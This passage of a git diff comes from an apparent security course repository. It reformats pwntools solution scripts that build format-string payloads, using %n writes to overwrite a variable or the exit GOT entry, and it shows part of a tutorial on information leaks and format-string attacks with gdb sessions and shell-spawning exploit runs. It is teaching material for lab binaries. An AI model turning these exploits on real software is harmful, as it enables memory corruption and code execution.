"$x" +for i in range(1, 1000): + # The spaces are needed in order to properly align the format string + # in 4B blocks - as the arguments for printf are treated as each being + # 4B. If you delete some spaces you will notice that it starts being off + payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i + 1) + "$x" - p = process(["./format1", payload]) + p = process(["./format1", payload]) - print("%d %s"% (i, p.read())) + print("%d %s" % (i, p.read())) - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format1.py index c0b16cc..2c6cdd2 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format1.py @@ -7,23 +7,30 @@ # the stack head varies between runs. We use helper_format1.py # to determine where it might reside -e = ELF('./format1', checksec=False) - -target_offset = e.symbols['target'] +e = ELF("./format1", checksec=False) + +target_offset = e.symbols["target"] # This number is found using helper_format1.py position = 256 for i in range(1000): - payload = "AAAABBBB" + p32(target_offset) + "DDDD %" + str(position) + "$n%" + str(position+1) + "$x" + payload = ( + "AAAABBBB" + + p32(target_offset) + + "DDDD %" + + str(position) + + "$n%" + + str(position + 1) + + "$x" + ) - p = process(["./format1", payload]) + p = process(["./format1", payload]) - try: - print("%s"% (p.read())) - break - except EOFError: - pass - + try: + print("%s" % (p.read())) + break + except EOFError: + pass - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format3.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format3.py index 37682da..99e3391 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format3.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format3.py @@ -2,11 +2,16 @@ from pwn import * import sys -e = ELF('./format3', checksec=False) - -target_addr = int(e.symbols['target']) +e = ELF("./format3", checksec=False) -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +target_addr = int(e.symbols["target"]) + +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) payload += "%52x" + "%12$n" + "%17x" + "%13$n" + "%173x" + "%14$n" print(payload) diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format4.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format4.py index 0e12a4d..757cf87 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format4.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/exploit_format4.py @@ -6,50 +6,58 @@ # could be shorter. The reason it is so long is because it takes into # account the fact that the address for the 'hello' function could change + # Helper function to extract one byte from an integer # ex. extract_byte(0xaabbccdd, 0) => 0xdd # ex. extract_byte(0xaabbccdd, 2) => 0xbb def extract_byte(value, pos): - return (value >> (pos * 8)) % 256 + return (value >> (pos * 8)) % 256 + def get_byte_padding(current, wanted): - # Fuction is supposed to only give paddings for one byte - wanted %= 256 - current %= 256 - - # Printing a hex value with less than 8 padding can - # print variable number of digits. We need to be sure - # how many digits we print - if wanted - 8 >= current: - return wanted - current - else: - return wanted + 256 - current - -e = ELF('./format4', checksec=False) - -target_addr = int(e.symbols['got.exit']) -hello_addr = int(e.symbols['hello']) + # Fuction is supposed to only give paddings for one byte + wanted %= 256 + current %= 256 + + # Printing a hex value with less than 8 padding can + # print variable number of digits. We need to be sure + # how many digits we print + if wanted - 8 >= current: + return wanted - current + else: + return wanted + 256 - current + + +e = ELF("./format4", checksec=False) + +target_addr = int(e.symbols["got.exit"]) +hello_addr = int(e.symbols["hello"]) # Position on the stack where the arguments will be pos = 4 -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) bytes_printed = len(payload) + 1 next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 0)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 1)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 1)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 1) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 2)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 2)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 2) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 3)) -payload += "%" + str(next_padding) + "x %" + str(pos + 3)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 3) + "$n" print(payload) @@ -58,4 +66,3 @@ def get_byte_padding(current, wanted): # p.sendline(payload) # print(p.read()) # p.close() - diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/helper_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/helper_format1.py index 5804e05..2191924 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/helper_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format3/sol/helper_format1.py @@ -4,16 +4,16 @@ # Run with: # python helper_format1.py | grep -va 'rocess' | grep -aP '.*?AAAABBBBCCCCDDDD.*?4[1234]' | grep -aP '4[1234]' -e = ELF('./format1') +e = ELF("./format1") -for i in range(1,1000): - # The spaces are needed in order to properly align the format string - # in 4B blocks - as the arguments for printf are treated as each being - # 4B. If you delete some spaces you will notice that it starts being off - payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i+1) + "$x" +for i in range(1, 1000): + # The spaces are needed in order to properly align the format string + # in 4B blocks - as the arguments for printf are treated as each being + # 4B. If you delete some spaces you will notice that it starts being off + payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i + 1) + "$x" - p = process(["./format1", payload]) + p = process(["./format1", payload]) - print("%d %s"% (i, p.read())) + print("%d %s" % (i, p.read())) - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format1.py index c0b16cc..2c6cdd2 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format1.py @@ -7,23 +7,30 @@ # the stack head varies between runs. We use helper_format1.py # to determine where it might reside -e = ELF('./format1', checksec=False) - -target_offset = e.symbols['target'] +e = ELF("./format1", checksec=False) + +target_offset = e.symbols["target"] # This number is found using helper_format1.py position = 256 for i in range(1000): - payload = "AAAABBBB" + p32(target_offset) + "DDDD %" + str(position) + "$n%" + str(position+1) + "$x" + payload = ( + "AAAABBBB" + + p32(target_offset) + + "DDDD %" + + str(position) + + "$n%" + + str(position + 1) + + "$x" + ) - p = process(["./format1", payload]) + p = process(["./format1", payload]) - try: - print("%s"% (p.read())) - break - except EOFError: - pass - + try: + print("%s" % (p.read())) + break + except EOFError: + pass - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format3.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format3.py index 37682da..99e3391 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format3.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format3.py @@ -2,11 +2,16 @@ from pwn import * import sys -e = ELF('./format3', checksec=False) - -target_addr = int(e.symbols['target']) +e = ELF("./format3", checksec=False) -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +target_addr = int(e.symbols["target"]) + +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) payload += "%52x" + "%12$n" + "%17x" + "%13$n" + "%173x" + "%14$n" print(payload) diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format4.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format4.py index 0e12a4d..25efc8f 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format4.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/exploit_format4.py @@ -6,50 +6,58 @@ # could be shorter. The reason it is so long is because it takes into # account the fact that the address for the 'hello' function could change + # Helper function to extract one byte from an integer # ex. extract_byte(0xaabbccdd, 0) => 0xdd # ex. extract_byte(0xaabbccdd, 2) => 0xbb def extract_byte(value, pos): - return (value >> (pos * 8)) % 256 + return (value >> (pos * 8)) % 256 + def get_byte_padding(current, wanted): - # Fuction is supposed to only give paddings for one byte - wanted %= 256 - current %= 256 - - # Printing a hex value with less than 8 padding can - # print variable number of digits. We need to be sure - # how many digits we print - if wanted - 8 >= current: - return wanted - current - else: - return wanted + 256 - current - -e = ELF('./format4', checksec=False) - -target_addr = int(e.symbols['got.exit']) -hello_addr = int(e.symbols['hello']) + # Function is supposed to only give paddings for one byte + wanted %= 256 + current %= 256 + + # Printing a hex value with less than 8 padding can + # print variable number of digits. We need to be sure + # how many digits we print + if wanted - 8 >= current: + return wanted - current + else: + return wanted + 256 - current + + +e = ELF("./format4", checksec=False) + +target_addr = int(e.symbols["got.exit"]) +hello_addr = int(e.symbols["hello"]) # Position on the stack where the arguments will be pos = 4 -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) bytes_printed = len(payload) + 1 next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 0)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 1)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 1)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 1) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 2)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 2)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 2) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 3)) -payload += "%" + str(next_padding) + "x %" + str(pos + 3)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 3) + "$n" print(payload) @@ -58,4 +66,3 @@ def get_byte_padding(current, wanted): # p.sendline(payload) # print(p.read()) # p.close() - diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/helper_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/helper_format1.py index 5804e05..2191924 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/helper_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format4/sol/helper_format1.py @@ -4,16 +4,16 @@ # Run with: # python helper_format1.py | grep -va 'rocess' | grep -aP '.*?AAAABBBBCCCCDDDD.*?4[1234]' | grep -aP '4[1234]' -e = ELF('./format1') +e = ELF("./format1") -for i in range(1,1000): - # The spaces are needed in order to properly align the format string - # in 4B blocks - as the arguments for printf are treated as each being - # 4B. If you delete some spaces you will notice that it starts being off - payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i+1) + "$x" +for i in range(1, 1000): + # The spaces are needed in order to properly align the format string + # in 4B blocks - as the arguments for printf are treated as each being + # 4B. If you delete some spaces you will notice that it starts being off + payload = "AAAABBBBCCCCDDDD %" + str(i) + "$x%" + str(i + 1) + "$x" - p = process(["./format1", payload]) + p = process(["./format1", payload]) - print("%d %s"% (i, p.read())) + print("%d %s" % (i, p.read())) - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md b/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md index ca605f4..15a3076 100644 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md @@ -1,668 +1,678 @@ ---- -linkTitle: Information Leaks -type: docs -weight: 10 ---- - -# Information Leaks - ------ - - -## Introduction ------ -#### Objectives & Rationale - -This is a tutorial based lab. Throughout this lab you will learn about frequent errors that occur when handling strings. This tutorial is focused on the C language. Generally, OOP languages (like Java, C\#,C++) are using classes to represent strings -- this simplifies the way strings are handled and decreases the frequency of programming errors. - - - -#### What is a string? - -Conceptually, a string is sequence of characters. The representation of a string can be done in multiple ways. One of the way is to represent a string as a contiguous memory buffer. Each character is **encoded** in a way. For example the **ASCII** encoding uses 7-bit integers to encode each character -- because it is more convenient to store 8-bits at a time in a byte, an ASCII character is stored in one byte. - -The type for representing an ASCII character in C is `char` and it uses one byte. As a side note, `sizeof(char) == 1` is the only guarantee that the [C standard](http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf "http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf") gives. - -Another encoding that can be used is Unicode (with UTF8, UTF16, UTF32 etc. as mappings). The idea is that in order to represent an Unicode string, **more than one** byte is needed for **one** character. `char16_t`, `char32_t` were introduced in the C standard to represent these strings. The C language also has another type, called `wchar_t`, which is implementation defined and should not be used to represent Unicode characters. - -Our tutorial will focus on ASCII strings, where each character is represented in one byte. We will show a few examples of what happens when one calls *string manipulation functions* that are assuming a specific encoding of the string. - - -You will find extensive information on ASCII in the [ascii man page](http://man7.org/linux/man-pages/man7/ascii.7.html "http://man7.org/linux/man-pages/man7/ascii.7.html"). - -Inside an Unix terminal issue the command - -``` {.code .bash} -man ascii -``` - - -### Length management ------------------ - - -In C, the length of an ASCII string is given by its contents. An ASCII string ends with a `0` value byte called the `NUL` byte. Every `str*` function (i.e. a function with the name starting with `str`, such as `strcpy`, `strcat`, `strdup`, `strstr` etc.) uses this `0` byte to detect where the string ends. As a result, not ending strings in `0` and using `str*` functions leads to vulnerabilities. - -### 1. Basic Info Leak (tutorial) - - -Enter the `01-basic-info-leak/` subfolder. It\'s a basic information leak example. - -In `basic_info_leak.c`, `buf` is supplied as input, hence is not trusted. We should be careful with this buffer. If the user gives `32` bytes as input then `strcpy` will copy bytes in `my_string` until it finds a `NUL` byte (`0x00`). Because the [stack grows down](/courses/cns/labs/lab-05 "cns:labs:lab-05"), on most -platforms, we will start accessing the content of the stack. After the `buf` variable the stack stores the `old rbp`, the function return address and then the function parameters. This information is copied into `my_string`. As such, printing information in `my_string` (after byte index `32`) using `puts()` results in information leaks. - -We can test this using: - -``` {.code} -$ python -c 'print("A"*32)' | ./basic_info_leak -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�8� -``` - -In order to check the hexadecimal values of the leak, we pipe the output -through `xxd`: - -``` {.code} -$ python -c 'print("A"*32)' | ./basic_info_leak | xxd -00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA -00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA -00000020: d066 57b4 fc7f 0a .fW.... -``` - -We have leaked one value above: - -the lower non-0 bytes of the old/stored `rbp` value (right after the buffer): `0x7ffcb45766d0` (it\'s a little endian architecture); it will differ on your system - -The return address usually doesn\'t change (except for executables with PIE, *Position Independent Executable* support). But assuming ASLR is enabled, the `rbp` value changes at each run. If we leak it we have a basic address that we can toy around to leak or overwrite other values. We\'ll see more of that in the [Information Leak](#p_information_leak "cns:labs:lab-07 ↵") task. - - -### 2. Information Leak - - -We will now show how improper string handling will lead to information leaks from the memory. For this, please access the `02-info-leak/` subfolder. Please browse the `info-leak.c` source code file. - -The snippet below is the relevant code snippet. The goal is to call the `my_evil_func()` function. One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. If you have memory writes, then getting code execution is a matter of getting things right. In this task we are assuming that we have memory write (i.e. we can write any value at any address). You can call the `my_evil_func()` function by overriding the return address of the `my_main()` function: - -``` -#define NAME_SZ 32 -  -static void read_name(char *name) -{ - memset(name, 0, NAME_SZ); - read(0, name, NAME_SZ); - //name[NAME_SZ-1] = 0; -} -  -static void my_main(void) -{ - char name[NAME_SZ]; -  - read_name(name); - printf("hello %s, what address to modify and with what value?\n", name); - fflush(stdout); - my_memory_write(); - printf("Returning from main!\n"); -} -``` - -What catches our eye is that the `read()` function call in the `read_name()` function read **exactly** `32` bytes. If we provide it `32` bytes it won\'t be null-terminated and will result in an information leak when `printf()` is called in the `my_main()` function. - - -#### Exploiting the memory write using the info leak {#exploiting_the_memory_write_using_the_info_leak} - - -Let\'s first try to see how the program works: - -``` -$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak -hello AAAAAAAAAA, what address to modify and with what value? -``` - -The binary wants an input from the user using the `read()` library call as we can see below: - -``` -$ python -c 'import sys; sys.stdout.write(10*"A")' | strace -e read ./info_leak -read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512 -read(0, "AAAAAAAAAA", 32) = 10 -hello AAAAAAAAAA, what address to modify and with what value? -read(0, "", 4) = 0 -+++ exited with 255 +++ -``` - -The input is read using the `read()` system call. The first read expects 32 bytes. You can see already that there\'s another `read()` call. That one is the first `read()` call in the `my_memory_write()` function. - -As noted above, if we use exactly `32` bytes for name we will end up with a non-null-terminated string, leading to an information leak. Let\'s see how that goes: - -``` -$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak -hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���, what address to modify and with what value? -  -$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd -00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141 hello AAAAAAAAAA -00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA -00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh -00000030: 6174 2061 6464 7265 7373 2074 6f20 6d6f at address to mo -00000040: 6469 6679 2061 6e64 2077 6974 6820 7768 dify and with wh -00000050: 6174 2076 616c 7565 3f0a at value?. -``` - -We see we have an information leak. We leak one piece of data above: `0x7fffffffdcf0`. If we run multiple times we can see that the values for the first piece of information differs: - -``` {.code .bash} -$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ',' -00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh -``` - -The variable part is related to a stack address (it starts with `0x7f`); it varies because ASLR is enabled. We want to look more carefully using GDB and figure out what the variable value represents: - -``` {.code .bash} -$ gdb -q ./info_leak -Reading symbols from ./info_leak...done. -gdb-peda$ b my_main -Breakpoint 1 at 0x400560 -gdb-peda$ r < <(python -c 'import sys; sys.stdout.write(32*"A")') -Starting program: info_leak < <(python -c 'import sys; sys.stdout.write(32*"A")') -[...] -  -# Do next instructions until after the call to printf. -gdb-peda$ ni -.... -  -gdb-peda$ x/12g name -0x7fffffffdc20: 0x4141414141414141 0x4141414141414141 -0x7fffffffdc30: 0x4141414141414141 0x4141414141414141 -0x7fffffffdc40: 0x00007fffffffdc50 0x00000000004007aa -gdb-peda$ x/2i 0x004007aa - 0x4007aa : mov edi,0x4008bc - 0x4007af : call 0x400550 -gdb-peda$ pdis main -Dump of assembler code for function main: - 0x00000000004007a1 <+0>: push rbp - 0x00000000004007a2 <+1>: mov rbp,rsp - 0x00000000004007a5 <+4>: call 0x400756 - 0x00000000004007aa <+9>: mov edi,0x4008bc - 0x00000000004007af <+14>: call 0x400550 - 0x00000000004007b4 <+19>: mov eax,0x0 - 0x00000000004007b9 <+24>: pop rbp - 0x00000000004007ba <+25>: ret -End of assembler dump. -gdb-peda$ -``` - -From the GDB above, we determine that, after our buffer, there is the stored `rbp` (i.e. old rbp). - - -In 32-bit program there would (usually) be 2 leaked values: - -- The old `ebp` - - -- The return address of the function - - -This happens if the values of the old `ebp` and the return address don\'t have any `\x00` bytes. - -in the 64-bit example we only get the old `rbp` because the 2 high bytes of the stack address are always `0` which causes the string to be terminated early. - - -When we leak the two values we are able to retrieve the stored `rbp` value. In the above run the value of `rbp` is `0x00007fffffffdc50`. We also see that the stored `rbp` value is stored at **address** `0x7fffffffdc40`, which is the address current `rbp`. We have the situation in the below diagram: - -![](https://ocw.cs.pub.ro/courses/_media/cns/labs/info-leak-stack-64.png) - -We marked the stored `rbp` value (i.e. the frame pointer for `main()`: `0x7fffffffdc50`) with the font color red in both places. - -In short, if we leak the value of the stored `rbp` (i.e. the frame pointer for `main()`: `0x00007fffffffdc50`) we can determine the address of the current `rbp` (i.e. the frame pointer for `my_main()`: `0x7fffffffdc40`), by subtracting `16`. The address where the -`my_main()` return address is stored (`0x7fffffffdc48`) is computed by subtracting `8` from the leaked `rbp` value. By overwriting the value at this address we will force an arbitrary code execution and call `my_evil_func()`. - -In order to write the return address of the `my_main()` function with the address of the `my_evil_func()` function, make use of the -conveniently (but not realistically) placed `my_memory_write()` function. The `my_memory_write()` allows the user to write arbitrary -values to arbitrary memory addresses. - -Considering all of this, update the `TODO` lines of the `exploit.py` script to make it call the `my_evil_func()` function. - - -Same as above, use `nm` to determine address of the `my_evil_func()` function. When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). - - - -Use the above logic to determine the `old rbp` leak and then the address of the `my_main()` return address. - - - -See [here](https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack "https://docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.unpack") examples of using the `unpack()` function. - - - -In case of a successful exploit the program will spawn a shell in the `my_evil_func()` function, same as below: - -``` {.code} -$ python exploit.py -[!] Could not find executable 'info_leak' in $PATH, using './info_leak' instead -[+] Starting local process './info_leak': pid 6422 -[*] old_rbp is 0x7fffffffdd40 -[*] return address is located at is 0x7fffffffdd38 -[*] Switching to interactive mode -Returning from main! -$ id -uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) -``` - - - -The rule of thumb is: **Always know your string length.** - - -#### Format String Attacks ---------------------- - - -We will now see how (im)proper use of `printf` may provide us with ways of extracting information or doing actual attacks. - -Calling `printf` or some other string function that takes a format string as a parameter, directly with a string which is supplied by the user leads to a vulnerability called **format string attack**. - -The definition of `printf`: - -``` {.code .bash} -int printf(const char *format, ...); -``` - -Let\'s recap some of [useful formats](http://www.cplusplus.com/reference/cstdio/printf/ "http://www.cplusplus.com/reference/cstdio/printf/"): - -- `%08x` -- prints a number in hex format, meaning takes a number from the stack and prints in hex format - - -- `%s` -- prints a string, meaning takes a pointer from the stack and prints the string from that address - - -- `%n` -- writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). This format is not widely used but it is in the C standard. - - -- `%x` and `%n` are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user. -::: - -### Example 2 - -``` {.code .C} -printf(my_string); -``` - -The above snippet is a good example of why ignoring compile time warnings is dangerous. The given example is easily detected by a static checker. - -Try to think about: - -- The peculiarities of `printf` (variable number of arguments) - - -- Where `printf` stores its arguments (*hint*: on the stack) - - -- What happens when `my_string` is `"%x"` - - -- How matching between format strings (e.g. the one above) and arguments is enforced (*hint*: it\'s not) and what happens in general when the number of arguments doesn\'t match the number of format specifiers - - -- How we could use this to cause information leaks and arbitrary memory writes (*hint*: see the format specifiers at the beginning of the section) - -::: - -### Example 3 - -We would like to check some of the well known and not so-well known features of [the printf function](http://man7.org/linux/man-pages/man3/printf.3.html "http://man7.org/linux/man-pages/man3/printf.3.html"). -Some of them may be used for information leaking and for attacks such as format string attacks. - -Go into `printf-features/` subfolder and browse the `printf-features.c` file. Compile the executable file using: - -``` {.code .bash} -make -``` - -and then run the resulting executable file using - -``` {.code .bash} -./printf-features -``` - -Go through the `printf-features.c` file again and check how print, length and conversion specifiers are used by `printf`. We will make use of the `%n` feature that allows memory writes, a requirement for attacks. -::: - -### Basic Format String Attack {#basic_format_string_attack .sectionedit11} - -You will now do a basic format string attack using the `03-basic-format-string/` subfolder. The source code is in `basic_format_string.c` and the executable is in `basic_format_string`. - -You need to use `%n` to overwrite the value of the `v` variable to `0x300`. You have to do three steps: - -1.Determine the address of the `v` variable using `nm`. - - -2.Determine the `n`-th parameter of `printf()` that you can write to using `%n`. The `buffer` variable will have to be that parameter; you will store the address of the `v` variable in the `buffer` variable. - - -3.Construct a format string that enables the attack; the number of characters processed by `printf()` until `%n` is matched will have to be `0x300`. - - -For the second step let\'s run the program multiple times and figure out where the `buffer` address starts. We fill `buffer` with the `aaaa` string and we expect to discover it using the `printf()` format specifiers. - -``` {.code} -$ ./basic_format_string -AAAAAAAA -%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx -7fffffffdcc07fffffffdcc01f6022897ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25 - -$ ./basic_format_string -AAAAAAAA -%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx -x7fffffffdcc07fffffffdcc0116022917ffff7dd18d06c6c25786c6c25786c6c25786c6c25786c6c25786c6c25787fffffffdcc07fffffffdcc01f6022917ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a - -$ ./basic_format_string -AAAAAAAA -%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx -7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a4141414141414141 -``` - -In the last run we get the `4141414141414141` representation of `AAAAAAAA`. That means that, if we replace the final `%lx` with `%n`, we will write at the address `0x4141414141414141` the number of characters processed so far: - -``` {.code} -$ echo -n '7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a' | wc -c -162 -``` - -We need that number to be `0x300`. You can fine tune the format string by using a construct such as `%32llx` to print a number on `32` characters instead of a maximum of `16` characters. See how much extra room you need and see if you reach `0x300` bytes. - - -The construct needn\'t use a multiple of `8` for length. You may use the `%32llx` or `%33llx` or `%42llx`. The numeric argument states the length of the print output. - -After the plan is complete, write down the attack by filling the `TODO` lines in the `exploit.py` solution skeleton. - - -When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. The precompiled binary can be found in [the CNS public repository](/courses/cns/resources/repo "cns:resources:repo"). - - -After you write 0x300 chars in v, you should obtain shell - -``` {.code} -$ python exploit64.py -[!] Could not find executable 'basic_format_string' in $PATH, using './basic_format_string' instead -[+] Starting local process './basic_format_string': pid 20785 -[*] Switching to interactive mode - 7fffffffdcc0 7fffffffdcc01f60229b7ffff7dd18d03125786c6c393425786c6c25786c6c34786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25a6e25 -$ -``` - - -### Extra: Format String Attack {#extraformat_string_attack .sectionedit12} - - -Go to the `04-format-string/` subfolder. In this task you will be working with a **32-bit binary**. - -The goal of this task is to call `my_evil_func` again. This task is also tutorial based. - -``` {.code .C} -int -main(int argc, char *argv[]) -{ - printf(argv[1]); - printf("\nThis is the most useless and insecure program!\n"); - return 0; -} -``` - - -#### Transform Format String Attack to a Memory Write {#transform_format_string_attack_to_a_memory_write} - - -Any string that represents a useful format (e.g. `%d`, `%x` etc.) can be used to discover the vulnerability. - -``` {.code .bash} -$ ./format "%08x %08x %08x %08x" -00000000 f759d4d3 00000002 ffd59bd4 -This is the most useless and insecure program! -``` - -The values starting with 0xf are very likely pointers. Again, we can use this vulnerability as a information leakage. But we want more. - -Another useful format for us is `%m$` followed by any normal format selector. Which means that the `m`th parameter is used as an input for the following format. `%10$08x` will print the `10`th paramater with `%08x`. This allows us to do a precise access of the stack. - -Example: - -``` {.code .bash} -$ ./format "%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x" -00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24 -This is the most useless and insecure program! -``` - -Note the equivalence between formats. - -Now, because we are able to select *any* higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer. - -``` {.code .bash} -$ ./format "$(python -c 